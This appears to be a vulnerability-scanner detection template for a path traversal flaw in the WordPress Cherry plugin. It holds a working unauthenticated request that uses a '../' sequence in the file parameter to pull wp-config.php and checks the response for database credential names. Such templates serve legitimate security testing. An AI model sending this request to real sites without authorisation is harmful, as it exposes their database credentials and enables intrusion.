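# Detection template for the WordPress Cherry plugin file-download flaw.
# It sends one unauthenticated GET to the plugin's download-content.php with a
# relative path in the `file` parameter and checks whether wp-config.php comes
# back in the response body.
# Scope note: the name and description also mention arbitrary file upload, but
# the request below exercises only the file-download (path traversal) side.
# The blame timestamps that were interleaved with the template have been
# dropped and the nesting restored so the file parses as YAML again.
id: cherry-lfi

info:
  name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
  author: dhiyaneshDK
  severity: high
  description: "WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file."
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
  classification:
    # The vector scores confidentiality impact only (C:H/I:N/A:N), which
    # matches the file-read check below rather than the upload issue.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    # Left empty in the original: no CVE identifier is given for this issue.
    cve-id:
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    # Both matchers must hit: the body has to contain both wp-config.php
    # constant names AND the status must be 200, so a 200 error page or a
    # page that mentions only one of the constants is not reported.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# Triage note: a match means wp-config.php was served to an unauthenticated
# request, so treat the database credentials in that file as exposed and
# rotate them. The template name gives versions before 1.2.7 as affected;
# update the plugin to 1.2.7 or later (or remove it).

# Enhanced by mp on 2022/04/21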